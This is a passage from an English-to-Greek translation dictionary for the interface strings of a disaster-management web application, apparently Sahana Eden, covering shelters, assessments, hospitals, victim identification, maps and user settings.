'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'Οποιαδήποτε διαθέσιμα μεταδεδομένα στα αρχεία θα διαβαστούν αυτόματα, όπως Χρονοσφραγίδα, Συγγραφέας, Γεωγραφικό μήκος & πλάτος',
'Archive not Delete': 'Αρχείο - Δεν διαγράφετε',
'Assessment Summary Details': 'Λεπτομέρειες της Έθεσης Εκτίμησης',
'Assessment updated': 'Αξιολόγηση ενημερώθηκε',
'Assessment': 'Εκτίμηση - Αξιολόγηση',
'Asset Assignments deleted': 'Αναθέσεις πόρων διεγράφησαν',
'Assign to Org.': 'Ανατέθηκε στον Οργανισμό.',
'Assigned To': 'Εκχωρήθηκε στον ',
'Assignments': 'Εκχωρήσεις εργασιών-καθηκόντων',
'At/Visited Location (not virtual)': 'Στην/Επισκεπτόμενη Θέση (μη εικονική)',
'Available databases and tables': 'Διαθέσιμες βάσεις δεδομένων και πίνακες',
'Available in Viewer?': 'Διαθέσιμο στην απεικόνιση?',
'Available until': 'Διαθέσιμη μονάδα',
'Availablity': 'Διαθεσιμότητα',
'Baby And Child Care': 'Φροντίδα μωρού και παιδιού',
'Background Color': 'Χρώμα υποβάθρου',
'Bank/micro finance': 'Τράπεζα μικροχρηματοδότησης',
'Base Unit': 'Μονάδα Βάσης',
'Baseline Type updated': 'Τύπος Baseline ενημερώθηκε',
'Baseline Types': 'Τύποι Αρχικοποίησης',
'Baselines Details': 'Λεπτομέρειες baseline',
'Basic information on the requests and donations, such as category, the units, contact details and the status.': 'Βασικές πληροφορίες για τα αιτήματα και τις δωρεές, όπως π.χ., κατηγορία, μονάδες, στοιχεία επικοιωνίας και κατάσταση',
'Basic reports on the Shelter and drill-down by region': 'Βασικές αναφορές για το κατάλλημα και κατασκηνώσεις ανα περιοχή',
'Basic': 'Βασικό',
'Baud': 'Ρυθμός μετάδοσης (baud)',
'Bed Type': 'Τύπος Κρεβατιού',
'Blood Type (AB0)': 'Ομάδα Αίματος (ΑΒ0)',
'Blowing Snow': 'Χιονοθυέλλα',
'Body Recovery Requests': 'Αιτήματα για ανάσυρη πτωμάτων',
'Bomb Explosion': 'Έκρηξη βόμβας',
'Border Color for Text blocks': 'Χρώμα περιγράμματος για κείμενο',
'Bounding Box Size': 'Μέγεθος Περιγράματος - Περιοχής Ενδιαφέροντος',
'Buddhist': 'Βουδιστής',
'Budget Updated': 'Προυπολογισμός ενημερώθηκε',
'Budget': 'Προϋπολογισμός',
'Budgets': 'Προϋπολογισμοί',
'Building Aide': 'Οικοδομική βοήθεια',
'Building Collapsed': 'Κατάρρευση Κτιρίου',
'Bulk Uploader': 'Μεταφορτωτής(Uploader) μεγάλου όγκου',
'Bundle Updated': 'Αναβάθμιση του πακέτου',
'Bundle': 'Δέσμη',
'Burned/charred': 'Καμμένο/απανθρακωμένο',
'CSS file %s not writable - unable to apply theme!': 'Τα αρχεία CSS %s δεν έιναι εγγράψιμα - Αδύνατον να εφαρμοστεί το θέμα',
'Calculate': 'Υπολογισμός',
'Cancelled': 'Ακυρώθηκε',
'Cannot be empty': 'Δεν μπορεί να είναι κενό',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Συλλογή δεδομένων σε ομάδες θυμμάτων (Τουρίστες, Επιβάτες, Οικογένειες, κλπ)',
'Cardiology': 'Καρδιολογική',
'Casual Labor': 'Περιστασιακή εργασία',
'Catalog Item added': 'Αντικείμενο καταλόγου προστέθηκε.',
'Catalog Item updated': 'Θέση Καταλόγου ενημερώθηκε',
'Catalog Item': 'Αντικείμενο καταλόγου',
'Check for errors in the URL, maybe the address was mistyped.': 'Κάντε έλεγχο για λάθη στις URL, ίσως να υπάρχει τυπογραφικό λάθος στη διεύθυνση.',
'Check if the URL is pointing to a directory instead of a webpage.': 'Ελέγξτε εαν η URL δείχνει προς φάκελο αρχείων αντί ιστοσελίδας',
'Checklist of Operations': 'Κατάλογος Ενεργειών',
'Child headed households (<18 yrs)': 'Νοικοκυριά με παιδιά (<18 ετών)',
'Children (2-5 years)': 'Παιδιά (2 - 5 ετών)',
'Children (5-15 years)': 'Παιδιά (5 - 15 ετών)',
'Children (< 2 years)': 'Παιδιά (< 2 ετών)',
'Cholera Treatment Capability': 'Δυνατότητα Θεραπείας Χολέρας',
'Cholera Treatment': 'Θεραπεία Χολέρας',
'Church': 'Εκκλησία',
'Click on the link %(url)s to reset your password': 'Πατήστε στο σύνδεσμο %(url)s to reset your password',
'Click on the link %(url)s to verify your email': 'Πατήστε στο σύνδεσμο %(url)s to verify your email',
'Clinical Laboratory': 'Κλινικό εργαστήριο',
'Closed': 'Κελιστό',
'Cluster Subsector added': 'Τμήμα υποτομέα προστέθηκε',
'Cluster Subsector deleted': 'Υπο-τομέας cluster διαγράφηκε',
'Cluster(s)': 'Τμήμα(τα)',
'Code': 'Κωδικός',
'Color of Buttons when hovering': 'Χ΄ρωμα των κουμπιών όταν υπάρχει μετακίνηση ποντικιού από πάνω',
'Color of dropdown menus': 'Χρώμα αναδιπλώμενων μενού',
'Column Choices (One Per Line': 'Επιλογές Στήλης (μία σε κάθε γραμμή',
'Comments': 'Σχόλια',
'Communication problems': 'Προβλήματα επικοινωνίας',
'Community Member': 'Μέλος κοινότητας',
'Complete Unit Label for e.g. meter for m.': 'Συμπληρώστε την ετικέτα για μονάδα μέτρησης , για παράδειγμα μέτρα αντί του m.',
'Config updated': 'Οι ρυθμίσεις (config) ανανεώθηκαν',
'Config': 'Καθορισμός (config)',
'Configs': 'Καθορισμοί(configs)',
'Confirmed': 'Επιβεβαιωμένα',
'Conflict Details': 'Λεπτομέρειες σύγκρουσης - διαμάχης',
'Consumable': 'Αναλώσιμο',
'Contact Data': 'Δεδομένα επικοινωνίας',
'Contact Directory': 'Επικοινωνία Directory',
'Contact Information Deleted': 'Πληροφορίες επαφής διαγράφηκαν',
'Contact Name': 'Όνομα επικοινωνίας',
'Contact us': 'Επικοινωνήστε μαζί μας',
'Contact': 'Επικοινωνήστε',
'Contacts': 'Επαφές',
'Corn': 'Καλαμπόκι',
'Cost per Megabyte': 'Κόστος ανά Megabyte',
'Create Catalog Item': 'Προσθήκη Νέου Αντικειμένου Καταλόγου',
'Create Catalog': 'Προσθήκη καταλόγου',
'Create Contact': 'Προσθήκη επαφής',
'Create Dead Body Report': 'Προσθήκη Αναφοράς Νεκρού',
'Create Feature Layer': 'Προσθήκη Επιπέδου Χάρτη(Feature)',
'Create Hospital': 'Προσθήκη Νοσοκομείου',
'Create Import Job': 'Δημιουργία Εισαγωγής Εργασίας ',
'Create Incident Report': 'Προσθήκη αναφοράς συμβάντος',
'Create Incident': 'Προσθήκη νέου συμβάντος',
'Create Marker': 'Προσθήκη νέου δείκτη',
'Create Member': 'Προσθήκη μέλους',
'Create Kit': 'Προσθήκη νέου Kit',
'Create Office': 'Προσθήκη γραφείου',
'Create Organization': 'Προσθήκη οργανισμού',
'Create Projection': 'Προσθήκη Προβολικού Συστήματος - Projection',
'Create Report': 'Προσθήκη νέας Αναφοράς',
'Create Request': 'Υποβολή Αιτήματος',
'Create Resource': 'Προσθήκη πόρου',
'Create Sector': 'Προσθήκη Τομέα',
'Create Shelter Service': 'Προσθήκη Νέας Υπηρεσίας Καταφυγίου',
'Create Shelter': 'Προσθήκη νέου Καταφυγίου',
'Create Skill': 'Προσθήκη νέου προσόντος',
'Create User': 'Προσθήκη Νέου Χρήστη',
'Create Warehouse': 'Προσθήκη Νέας Αποθήκης',
'Create a group entry in the registry.': 'Δημιουργήστε μια καταχώρηση ομάδας στο μητρώο.',
'Credential Details': 'Λεπτομέρειες πιστοποίησης',
'Crime': 'Έγκλημα',
'Current Group Members': 'Τρέχοντα μέλη ομάδος',
'Current Memberships': 'Τρέχοντα μέλη',
'Current Twitter account': 'Τρέχων λογαριασμός Twitter ',
'Current problems, details': 'Τρέχοντα προβλήματα, λεπτομέρειες',
'Customisable category of aid': 'Παραμετροποιήσιμη κατηγορία βοήθειας.',
'DECISION': 'ΑΠΟΦΑΣΗ',
'Dam Overflow': 'Υπερχείλιση Φράγματος ',
'Dangerous Person': 'Επικίνδυνο Άτομο',
'Data uploaded': 'Δεδομένα μεταφορτώθηκαν',
'Date and Time of Goods receipt. By default shows the current time but can be modified by editing in the drop down list.': 'Ημερομηνία και Ώρα παραλαβής αγαθών. Εξ ορισμού δείχνει την τρέχουσα ώρα και μπορεί να τροποποιηθεί από την drop down λίστα.',
'Date of Latest Information on Beneficiaries Reached': 'Ημερομηνία λήψης πιο πρόσφατων πηλροφοριών για δικαιούχους',
'Date of Report': 'Ημερομηνία της έκθεσης',
'Date/Time of Find': 'Ημερομηνία / Ώρα Ανεύρεσης',
'Date/Time': 'Ημερομηνία/Ώρα',
'Dead Body Reports': 'Αναφορές νεκρών',
'Deaths/24hrs': 'Απώλειες ανά 24ώρο',
'Decentralized Administration': 'αποκεντρωμένες διοικήσεις',
'Decentralized Administrations': 'αποκεντρωμένες διοικήσεις',
'Decimal Degrees': 'Δεκαδικοί βαθμοί',
'Default Height of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': "Εξ' ορισμού ύψος του παραθύρου χάρτη. Στη διαρύθμιση των παραθύρων ο χάρτης μεγιστοποιείται για να γεμίσει το παράθυρο, έτσι λοιπόν δεν είναι απαραίτητο να βάλετε μεγαλύτερη τιμή εδώ.",
'Default synchronization policy': 'Προεπιλεγμένη πολιτική συγχρονισμού',
'Defaults updated': 'Προκαθορισμένες ρυθμίσεις ενημερώθηκαν',
'Delete Assessment Summary': 'Διαγραφή Περίληψης Αξιολόγησης',
'Delete Baseline': 'Διαγραφή Baseline',
'Delete Bundle': 'Διαγραφή πακέτου (bundle)',
'Delete Config': 'Διαγραφή του config',
'Delete Distribution Item': 'Διαγραφή Αντικειμένου προς διανομή',
'Delete Incident Report': 'Διαγραφή Αναφοράς Συμβάντος',
'Delete Item': 'Διαγραφή αντικειμένου',
'Delete Kit': 'Διαγραφή kit',
'Delete Layer': 'Διαγραφή επιπέδου',
'Delete Location': 'Διαγραφή τοποθεσίας',
'Delete Marker': 'Διαγραφή δείκτη',
'Delete Membership': 'Διαγραφή μέλους',
'Delete Need Type': 'Διαγραφή τύπων αναγκών',
'Delete Need': 'Διαγράψτε την ανάγκη',
'Delete Office': 'Διαγραφή Γραφείου',
'Delete Old': 'Διέγραψε Παλαιότερο',
'Delete Photo': 'Διαγραφή Φωτογραφίας',
'Delete Project': 'Διαγραφή έργου (project)',
'Delete Projection': 'Διαγραφή Προβολικού Συστήματος',
'Delete Rapid Assessment': 'Διαγραφή Στιγμιαίας εκτίμησης',
'Delete Recovery Report': 'Διαγραφή Αναφοράς Ανάσυρσης/Αποκατάστασης',
'Delete Section': 'Διαγραφή τμήματος',
'Delete Service Profile': 'Διαγραφή Προφιλ Υπηρεσίας',
'Delete Survey Question': 'Διαγραφή ερώτησης έρευνας',
'Delete Survey Template': 'Διαγραφή Προτύπου Αναζήτησης-Έρευνας',
'Delete Unit': 'Διαγραφή μονάδας',
'Delete Warehouse': 'Διαγραφή Αποθήκης',
'Delete from Server?': 'Διαγραφή από το Server?',
'Demographic': 'Δημογραφικό',
'Dental Examination': 'Οδοντιατρική εξέταση',
'Dental Profile': 'Οδοντικό Προφίλ',
"Describe the procedure which this record relates to (e.g. 'medical examination')": 'Περιγράψτε την διαδικασία με την οποία σχετίζεται αυτή η εγγραφή (π.χ. "Ιατρική Εξέταση")',
'Description of defecation area': 'Περιγραφή της περιοχής defecation',
'Description': 'Περιγραφή',
'Destination': 'Προορισμός',
'Direction': 'Κατεύθυνση',
'Disaster Victim Identification': 'Αναγνώριση θυμάτων καταστροφής',
'Disasters': 'καταστροφές',
'Discussion Forum': 'Βήμα συζητήσεων',
'Disease vectors': 'Διανύσματα ασθενειών',
'Dispatch': 'Διαβίβαση',
'Dispensary': 'Ιατρείο',
'Dispose': 'Διάθεση',
'Distribution Item Details': 'Λεπτομέρειες Αντικειμένου Διανομής',
'Distribution Item': 'Αντικείμενο για διανομή',
'District': 'Περιοχή',
'Do you want to over-write the file metadata with new default values?': 'Θέλετε να διαγράψετε το αρχείο μεταδεδομένων με τις νέες προκαθορισμένες τιμές;',
'Document Details': 'Λεπτομέρειες Εγγράφου',
'Document added': 'Έγγραφο προστέθηκε',
'Doing nothing (no structured activity)': 'Καμία ενέργεια (μη δομημένη ενέργεια)',
'Domestic chores': '"Οικιακές" μικροεργασίες',
'Donation Phone #': 'Τηλεφωνικός αριθμός δωρεών #',
'Donor added': 'Προσθήκη Δωρητή',
'Donor updated': 'Δωρητής ανανεώθηκε',
'Donors Report': 'Αναφορά Δότη',
'Draft': 'Πρόχειρο',
'Drugs': 'Φάρμακα',
'Dug Well': 'Σκαμμένο Πηγάδι',
'Duration': 'Διάρκεια',
'EMS Status': 'Κατάσταση EMS',
'Early Recovery': 'Έγκαιρη αποκατάσταση - εύρεση',
'Earthquake': 'Σεισμός',
'Edit Application': 'Επεξεργασία Εφαρμογής',
'Edit Assessment': 'Επεξεργασία Αξιολόγησης',
'Edit Bundle': 'Επεξεργασία του πακέτου',
'Edit Commitment': 'Επεξεργασία Υποχρέωσης-Δέσμευσης',
'Edit Contact': 'Επεξεργασία Επαφής',
'Edit Defaults': 'Επεξεργασία Προεπιλογών (Defaults)',
'Edit Details': 'Επεξεργσία λεπτομεριεών',
'Edit Disaster Victims': 'Επεξεργασία Θυμάτων Καταστροφής',
'Edit Distribution': 'Επεξεργασία Διανομής',
'Edit Document': 'Επεξεργασία κειμένου',
'Edit Identification Report': 'Επεξεργασία Έκθεσης Ταυτοποίησης',
'Edit Image Details': 'Επεξεργασία λεπτομεριών εικόνας',
'Edit Image': 'Επεξεργασία εικόνας',
'Edit Impact': 'Επεξεργασία επιπτώσεων',
'Edit Incident': 'Επεξεργασία Συμβάντος',
'Edit Item Catalog Categories': 'Επεξεργασία κατηγοριών καταλόγου αντικειμένων',
'Edit Item Catalog': 'Επεξεργασία Καταλόγου Αντικειμένων',
'Edit Item': 'Επεξεργασία αντικειμένου',
'Edit Key': 'Επεξεργασία κλειδιού',
'Edit Message': 'Επεξεργασία Μηνύματος',
'Edit Messaging Settings': 'Επεξεργασία ρυθμίσεων μηνυμάτων',
'Edit Metadata': 'Επεξεργασία μεταδεδομένων',
'Edit Peer Details': 'Επεξεργασία λεπτομερειών του Peer',
'Edit Problem': 'Επεξεργασία Προβλήματος',
'Edit Received Shipment': 'Επεξεργασία Ληφθέντος φορτίου',
'Edit Recovery Details': 'Επεξεργασία Λεπτομέρειων Ανάκτησης',
'Edit Report': 'Επεξεργασία Αναφοράς',
'Edit Request': 'Επεξεργασία Αίτησης',
'Edit Resource': 'Επεξεργασία Πόρου',
'Edit Response': 'Επεξεργασία Απάντησης-Ανταπόκρισης',
'Edit Role': 'Επεξεργασία Ρόλου',
'Edit Sector': 'Επεξεργασία Τομέα',
'Edit Setting': 'Επεξεργσία Ρύθμισης',
'Edit Settings': 'Επεξεργασία Ρυθμίσεων (settings)',
'Edit Shelter Service': 'Επεξεργασία Υπηρεσιών Καταυλισμών',
'Edit Shelter': 'Επεξεργασία καταλήματος',
'Edit Skill': 'Επεξεργασία προσόντων',
'Edit Storage Location': 'Επεξεργασία θέσης αποθήκευσης',
'Edit Survey Answer': 'Επεξεργασία απαντήσεων έρευνας',
'Edit Survey Template': 'Επεξεργασία προτύπου (template) έρευνας',
'Edit Ticket': 'Επεξεργασία Ειστηρίου',
'Edit current record': 'Επεξεργασία τρέχουσας εγγραφής',
'Edit the Application': 'Επεξεργασία της εφαρμογής',
'Editable?': 'Επεξεργάσιμο?',
'Education materials received': 'Λήφθησαν εκπαιδευτικά υλικά',
'Education materials, source': 'Εκπαιδευτικά υλικά, από που προέρχονται',
'Education': 'Εκπαίδευση',
'Either file upload or image URL required.': 'Είτε μεταφορτώστε αρχείο ή δώστε URL εικόνας',
'Elevated': 'Υπερυψωμένο',
'Embalming': 'Βαλσάμωμα',
'Emergency Department': 'Τμήμα Πρώτων Βοηθειών',
'Emergency Shelter': 'Καταφύγιο Εκτάκτου Ανάγκης',
'Enable/Disable Layers': 'Ενεργοποίηση/Απενεργοποίηση επιπέδων',
'End date': 'Ημερομηνία Τέλους',
'Enter Coordinates:': 'Εισάγετε συντεταγμένες',
'Enter a name for the spreadsheet you are uploading (mandatory).': 'Εισήγαγε όνομα για το λογιστικό φύλλο που μεταφορτώνεις (υποχρεωτικό).',
'Enter a summary of the request here.': 'Εισάγετε περίληψη του αιτήματος εδώ:',
'Enter your firstname': 'Εισάγεται το μικρό σας όνομα',
'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': 'Η εισαγωγή ενός τηλεφωνικού αριθμού είναι προαιρετική, αλλά αυτό σας επιτρέπει να εγγραφείτε για να λαμβάνετε μηνύματα SMS.',
"Error logs for '%(app)s'": 'Καταγραφή σφαλμάτων για "%(app)s"',
'Errors': 'Σφάλματα',
'Estimated # of households who are affected by the emergency': 'Εκτιμώμενος αριθμός των νοικοκυριών που πλήττονται από την κατάσταση έκτακτης ανάγκης',
'Euros': 'Ευρώ',
'Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)': 'Αξιολογήστε τις πληροφορίες σε αυτό το μήνυμα. (Η τιμή/αξιολόγηση δεν πρέπει να χρησιμοποιηθέι σε εφαρμογές δημόσιας προειδοποίησης)',
'Event Type': 'Τύπος Συμβάντος',
'Event type': 'Τύπος Συμβάντος',
'Example': 'Παράδειγμα',
'Expected Out': 'Ανεμένται να είναι εκτός',
'Expiry_Date': 'Ημερομηνία_Λήξης',
'Export Data': 'Εξαγωγή δεδομένων',
'Export in GPX format': 'Εξαγωγή σε GPX μορφότυπο',
'Eye Color': 'Χρώμα ματιών',
'Facial hair, color': 'Κόμη, χρώμα',
'Family tarpaulins, source': 'Οικογενειακοί μουσαμάδες, πηγή',
'Family/friends': 'Οικογένεια / φίλους',
'Feature Layer updated': 'Επίπεδο χαρακτηριστικών αναβαθμίστηκε',
'Feature Type': 'Τύπος Χαρακτηριστικού',
'Female headed households': 'Μητριαρχικά νοικοκυριά',
'Few': 'Ελάχιστα',
'Find Recovery Report': 'Βρείτε Έκθεση Ανάκτησης',
'Find': 'Αναζήτησε',
'Fingerprinting': 'Δακτυλικά αποτυπώματα',
'First name': 'Κυρίως όνομα',
'Flood Report Details': 'Λεπτομέρειες αναφοράς πλυμμήρας',
'Flood': 'Πλημμύρα',
'Focal Point': 'Σημείο Εστίασης',
'Food Supply': 'Προμήθεια τροφίμων',
'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'Για κάθε συγχρονισμό μεταξύ συνεργατών, υπάρχει μια προεπιλεγμένη διεργασία συγχρονισμού που τρέχει μετά από ένα ορισμένο χρονικό διάστημα. Μπορείτε επίσης να δημιουργήσετε περισσότερες διεργασίες συγχρονισμού η οποίες θα μπορούσαν να προσαρμοστούν στις ανάγκες σας. Κάντε κλικ στο σύνδεσμο δεξιά για να ξεκινήσετε.',
'Formal camp': 'Κανονικό Στρατόπεδο',
'Format': 'Μορφότυπος - Δομή',
'Found': 'Ευρέθηκε',
'Foundations': 'Θεμέλια',
'Full beard': 'Γενειοφόρος',
'Further Action Recommended': 'Προτείνονται περαιτέρω ενέργειες',
'GPS Marker': 'Δείκτης GPS',
'Gap Map': 'Χάρτης κενών "GAP"',
'General emergency and public safety': 'Γενική ανάγκη και δημόσια ασφάλεια',
'Generator': 'Δημιουργός',
'Global Messaging Settings': 'Γενικές Ρυθμίσεις Μηνυμάτων',
'Glossary': 'γλωσσάριο',
'Greek': 'ελληνικά',
'Group Members': 'Μέλη Ομάδας',
'Group Type': 'Τύπος ομάδας',
'Group added': 'Ομάδα προστέθηκε',
'Group description': 'Περιγραφή ομάδας',
'Group type': 'Τύπος Ομάδας',
'Group': 'Ομάδα',
'Hair Style': 'Τύπος μαλιών',
'Has data from this Reference Document been entered into Sahana?': 'Έχουν εισαχθεί δεδομένα για το συγκεκριμένο Έγγραφο Αναφοράς στο Sahana;',
'Has only read-only access to records relating to this Organization or Site.': 'Έχει μόνο πρόσβαση για ανάγνωση εγγραφών που σχετίζονται με αυτό τον Οργανισμό ή την Περιοχή',
'Header Background': 'Υπόβαθρο Επιγραφής-Κεφαλίδας',
'Health center': 'Κέντρο Υγείας',
'Health': 'Υγεία',
'History': 'Ιστορικό',
'Hit the back button on your browser to try again.': 'Πατήστε το κουμπί "Πίσω" στον browser σας για να προσπαθήσετε ξανά.',
'Hospital Details': 'Λεπτομέρειες Νοσοκομείου',
'Hospital information added': 'Προσατέθηκαν πληροφορίες Νοσοκομείων',
'Hospital': 'Νοσοκομείο',
'Hot Spot': 'Θερμό Σημείο',
'How many Boys (0-17 yrs) are Dead due to the crisis': 'Πόσα αγόρια (0-17 ετών) είναι νεκρά εξαιτίας της κρίσης',
'How many Boys (0-17 yrs) are Injured due to the crisis': 'Πόσα παιδιά (0-17 ετών) έχουν τραυματιστεί εξ΄ αιτίας της κρίσης',
'How many Girls (0-17 yrs) are Injured due to the crisis': 'Πόσα κορίτσια (0-17 ετών) έχουν τραυματιστεί εξαιτίας της κρίσης',
'How many Men (18 yrs+) are Dead due to the crisis': 'Πόσοι άντρες (18 ετών και άνω) είναι νεκροί λόγω της κρίσης',
'How many Women (18 yrs+) are Injured due to the crisis': 'Πόσες γυναίκες (18 ετών +) τραυματίσθηκαν εξαιτίας της κρίσης',
'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'Πόση λεπτομέρεια είναι ορατή. Υψιλό επίπεδο εστίασης σημαίνει μεγαλύτερη λεπτομέρεια αλλά όχι σε ευρεία περιοχή. Χαμηλό επίπεδο εστίασης σημαίνει εποπτεία μεγαλύτερης περιοχής, αλλά όχι με υψηλό επίπεδο λεπτομέριεας.',
'Hygiene NFIs': 'Υγιεινή NFIs',
'Hygiene kits, source': 'Κιτ προσωπικής υγιεινής, προμηθευτής',
'Hygiene practice': 'Πρακτική υγιεινής',
'Ice Pressure': 'πίεση πάγου',
'Identification label of the Storage bin.': 'Καρτέλα αναγνώρσισης-ταύτισης στο καλάθι αποθήκευσης',
'Identity': 'Ταυτότητα - Αναγνωριστικό',
'If yes, specify what and by whom': 'Εαν ΝΑΙ, προσδιόρισε ΤΙ, και από ΠΟΙΟΝ',
'If you need to add a new document then you can click here to attach one.': 'Εαν πρέπει να προσθέσετε νέο έγγραφο μπορείτε να κάνετε κλικ εδώ να επισυνάψετε ένα',
'If you would like to help, then please': 'Εαν θέλετε να βοηθήσετε, τότε παρακαλώ',
'Image/Attachment': 'Εικόνα/συνημμένο',
'Impact Assessments': 'Εκτίμηση Επιπτώσεων',
'Impact Details': 'Λεπτομέρειες Επιπτώσεων',
'Impact Type added': 'Τύπος επιπτώσεων προστέθηκε',
'Impact updated': 'Αντίκτυπος-Επιπτώσεις επικαιροποιήθηκαν',
'Import & Export Data': 'Εισαγωγή και εξαγωγή δεδομένων',
'Import Jobs': 'Εισαγωγή εργασιών',
'Import if Master': 'Εισαγωγή, εαν είστε κύριος.',
'Import job created': 'Εργασία εισαγωγής δημιουργήθηκε',
'Import multiple tables as CSV': 'Εισαγωγή πολλαπλών πινάκων σαν CSV',
'Important': 'Σημαντικό',
'Imported': 'Εισάχθηκε',
'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Στον Geosrver, αυτό είναι το όνομα του επιπέδου. Μέσα στο WFS getCapabilities, αυτό είναι το τμήμα FeatureType Name μετά τα διαλυτικά (:). ',
'Incident Report Details': 'Λεπτομέρειες Έκθεσης Περιστατικού ',
'Incident Report added': 'Αναφορά Συμβάντος προστέθηκε',
'Incident Report deleted': 'Αναφορά συμβάντος διαγράφηκε',
'Incident': 'Συμβάν',
'Incidents': 'περιστατικά',
'Informal camp': 'Άτυπη κατασκήνωνση/στρατόπεδο',
'Information gaps': 'Κενά πληροφοριοδότησης',
'Infusion catheters needed per 24h': 'Καθετήρες έγχυσης που απαιτούνται ανά 24ώρο',
'Infusions available': 'Εγχύσεις / Ενέσεις Διαθέσιμες',
'Instant Porridge': 'Στιγμιαίος πουρές',
'International NGO': 'Διεθνής Μη Κυβερνητικός Οργανισμοός',
'International Organization': 'Διεθνής Οργανισμός',
'Invalid Query': 'Μη έκγυρη ερώτηση / αναζήτηση',
'Invalid ticket': 'Μη έγκυρο εισητήριο',
'Inventory of Effects': 'Κατάλογος των συνεπειών',
'Item Catalog added': 'Προστέθηκε Κατάλογος αντικειμένων',
'Item Catalog deleted': 'Κατάλογος Αντικειμένων Διαγράφηκε',
'Item Category added': 'Αντικείμενο Καταλόγου Κατηγορίας προστέθηκε',
'Item Category': 'Κατηγορία αντικειμένου καταλόγου',
'Item Category deleted': 'Αντικείμενο Κατηγορίας διαγράφηκε',
'Item Pack Details': 'Λεπτομέρειες Πακέτου Αντικειμένου',
'Item Pack updated': 'Πακέτο Αντικειμένου επικαιροποιήθηκε',
'Item Sub-Category updated': 'Υπο-κατηγορία Αντικειμένου ενημερώθηκε',
'Item already in Bundle!': 'Αντικείμενο ήδη σε πακέτο (συσκευασμένο)',
'Item deleted': 'Αντικείμενο διαγράφηκε',
'Item updated': 'Αντικείμενο μεταφορτώθηκε',
'Items': 'Είδη',
'Jew': 'Ιουδαίος',
'Key': 'Κλειδί (key)',
'Kit Details': 'Λεπτομέρειες kit',
'Kit deleted': 'Kit διαγράφηκε',
'LICENSE': 'Άδεια Χρήσης',
'LMS Administration': 'Διαχείριση LMS',
'Label': 'Ετικέτα',
'Lack of transport to school': 'Έλλειψη μεταφορικού μέσου προς στο σχολείο',
'Last updated on': 'Τελευταία ενημέρωση στις',
'Latest Information': 'Τελευταίες πληροφορίες',
'Latitude & Longitude': 'Γεωγραφικό Πλάτος & Γεωγραφικό Μήκος',
'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Το Γεωγραφικό Πλάτος είναι από το Βορά προς το Νότο. Το Γεωγραφικό πλάτος είναι μηδέν στον ησιμερινό, θετικό στο Βόρειο ημισφαίριο και αρνητικό στο Νότιο ημισφαίριο',
'Latitude': 'Γεωγραφικό Πλάτος',
'Layer deleted': 'Layer διαγράφηκε',
'Layer updated': 'Επίπεδο δεδομένων ενημερώθηκε',
'Layers updated': 'Επίπεδα ενημερώθηκαν',
'Length': 'Μήκος',
'Level 1 Assessment deleted': 'Αξιολόγηση Επιπέδου 1 διαγράφηκε',
'Linked records': 'Συνδεδεμένα αρχεία-εγγραφές',
'List / Add Baseline Types': 'Λίστα / Προσθήκη Βασικών Τύπων',
'List All Memberships': 'Κατάλογος όλων των μελών',
'List All': 'Κατάλογος Όλων',
'List Assessment Summaries': 'Κατάλογος περιλήψεων εκτιμήσεων',
'List Assessments': 'Κατάλογος Αξιολογήσεων ',
'List Baseline Types': 'Είδη Αρχικοποίησης Καταλόγου',
'List Baselines': 'Κατάλογος Baselines',
'List Checklists': 'Κατάλογοι ελέγχου Κατάλογων',
'List Distributions': 'Κατάλογος Διανομών',
'List Groups': 'Κατάλογος Ομάδων',
'List Item Categories': 'Λίστα Κατηγοριών Αντικειμένων',
'List Item Sub-Categories': 'Λίστα υπό-κατηγοριών αντικειμένων',
'List Items': 'Κατάλογος Αντικειμένων',
'List Kits': 'Κατάλογος Kits',
'List Locations': 'Κατάλογος τοποθεσιών',
'List Members': 'Κατάλογος Μελών',
'List Memberships': 'Κατάλογος μελών',
'List Messages': 'Κατάλογος Μηνυμάτων',
'List Metadata': 'Κατάλογος Μετα-δεδομένων',
'List Needs': 'Λίστα Αναγκών',
'List Resources': 'Λίστα Πόρων',
'List Rivers': 'Κατάλογος Ποταμών',
'List Roles': 'Κατάσταση Ρόλων',
'List Shipment/Way Bills': 'Κατάσταση αποστολών αντικειμένων / Τιμολόγια-Λογαριασμοί',
'List Sites': 'Κατάλογος Περιοχών',
'List Skills': 'Κατάλογος δεξιοτήτων-προσόντων',
'List Staff': 'Κατάλογος Προσωπικού',
'List Storage Location': 'Κατάλογος θέσεων Αποθηκών',
'List Subscriptions': 'Κατάλογος εγγραφών',
'List Survey Series': 'Κατάλογος Σειράς Ερευνών',
'List Tickets': 'Κατάλογος "εισιτηρίων"',
'List Units': 'Κατάλογος Μονάδων',
'List Users': 'Κατάλογος Χρηστών',
'List Warehouses': 'Κατάλογος Αποθηκών',
'List all': 'Λίστα όλων',
'List unidentified': 'Κατάλογος μη αναγνωρισμένων',
'List': 'Λίστα - Κατάλογος',
'List/Add': 'Κατάλογος/Προσθήκη',
'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': 'Κατάλογοι " Ποιός κάνει τι και που". Επιτρέπει στους εμπλεκόμενους φορείς να συντονίζουν τις ενέργειές τους.',
'Live Help': 'Ζωντανή Βοήθεια',
'Local Name': 'Τοπικό Όνομα',
'Location deleted': 'Τοποθεσία διαγράφηκε',
'Log entry deleted': 'Καταγραφή (Log) διαγράφηκε',
'Log entry updated': 'Ανανεώθηκε εισαγωγή καταγραφής',
'Login': 'Σύνδεση',
'Logo': 'Λογότυπο',
'Logout': 'Έξοδος',
'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Το Μήκος είναι από Δυτικά προς Ανατολικά. Το Μήκος είναι 0 στον πρώτο μεσημβρινό (Μεσημβρινός του Greenwitch) και είναι θετικό προς τα ανατολικά κατά μήκος της Ερώπης και της Ασίας. Το Μήκος είναι αρνητικό προς τα Δυτικά κατά μήκος του Ατλαντικού και στην Αμερική.',
